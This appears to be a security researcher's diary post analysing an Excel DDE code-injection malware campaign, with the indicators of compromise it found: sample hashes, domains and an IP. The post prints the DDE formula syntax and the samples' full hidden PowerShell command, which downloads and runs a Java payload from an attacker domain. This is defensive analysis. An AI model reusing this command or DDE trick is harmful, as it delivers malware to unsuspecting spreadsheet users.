More Excel DDE Code Injection, (Fri, Sep 28th)

The “DDE code injection” technique is not brand new. DDE stands for “Dynamic Data Exchange”[1]. It has already been discussed by many security researchers[2]. Just a quick reminder for those who missed it. In Excel, it is possible to trigger the execution of an external command by using the following syntax:

=cmd|’arguments’!cell

If some malicious Excel files were spotted recently, I found yesterday a bunch of files all related to the same campaign. The interesting fact is that all those files have a VT score of 0! Indeed, they contain a lot of junk strings and,  in the middle of them, a DDE injection:

$ head -10 24711ad4f13bde4451ebac2a2f2a5c7406f048f6b56dc1ec868d7f2da5cc8c98.vir lljecTcCsRfkqsBfL2ud7yg1Eeeb
KZiUlYv8rqf52TeMTPvmoOPxhmFYrInZMo897D
tWgf38B1VjbL2Rp4LXyCuaDbcAk9wuSuA3PLjDmXSmIaTb6ZxEcswmHSTRXo6Fl54NRVLl7onJMgJOnxGWXayUq
GgHUNdPiWdihpKxfhuQJetYn2CpxVWUzIQZwONaVYOwQ1pvP
RsrzZKKq1GjBhFzkzXQhs9i3A5Jvb46HdNyEqpMVJtlljecTcCsRfkqsBfL2ud7yg1EeebNrKZi
Yv8rqf52TeMTPvmoOPxhmFYrInZMo897DtjtWgf38B1VjbL

By default, Excel will consider any file not recognized as a valid sheet as CSV and will open it as is.

Here is the command executed:

powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"hxxp://topehagepa[.]online\" ,\" %temp%\\WJJWBHVFUG.jar\") }" & %temp%\\WJJWBHVFUG.jar’

I’m using a YARA rule to catch them on VirusTotal and I already found some samples and related domain names.

SHA256 of samples:

002055c485975c5e66f0aa1f30eb9b96bc748285ced1147e7956577cf76180e2
ccc6bc1f52c0caa94626fc1616afcf8ebdc49a03a3dfa280c4395eeb75af144f
9d3b99b0fa2301d36bce4ae14c3df91813ed6583dd0ff7a312a66551771729a3
b8e494d1ca0ecaa36c2c7560dcc6124356aa333bb7db1416c79c1f0081ffc04f
24711ad4f13bde4451ebac2a2f2a5c7406f048f6b56dc1ec868d7f2da5cc8c98
2a0fba56858872b12d58c7d388f641e7f526ef8de814626005b209682c185a99
71ad0ea269cbcf7b170adecbc151286b69fc912b4babd08e87bd38269e21e5a4
ac411a12ab007383829aa30b2584d5865b5762455a952c405495809f78fb084e
90e26612d53425752261a88b21907e29a29ed8bb51847e4bd4cad2b2e399ba50
4eabaac1d528ab5143b3564138c0b5af41dee765a883140bc4797c2f635500a2
9b3064a08ad6729c5280941467de799886e92268a83be2407748bd38338ccb38
1987505b9b7ba75b0972b4152650ca8503de1a2d964df5dc33ec8aa10f71be59
61a9a14f8b50cbc38082ee5068608be7399a14ba84e79d536aec6fdeef54a9b4
7305236f00e95f64282309af810a7ec9a331cb07f5d708e3bf57c15b24e59a37
7d70ba42d1e5f6cdacaaccf11a8fc3166db9d846f1999673aff339163775d673
557c1e7a180708f45e8419a9439568872cacf20399f56345bbe33436b25f6e22

Domain names:

cafogekago[.]online
yepeyowora[.]online
jekarebege[.]online
gelovosaja[.]club
topehagepa[.]online
nomawesefa[.]club
saboverome[.]online
vazawoweso[.]online

All the domains resolve to the same IP address: 54.36.212.133 (located at OVH in France) but the server is down at the moment. The downloaded file being a Java archive, there are chances that it’s a classic Trojan. Anybody successfully got access to this files? I’d be happy to have a look at it.

[1] https://docs.microsoft.com/en-us/windows/desktop/dataxchg/dynamic-data-exchange
[2] https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key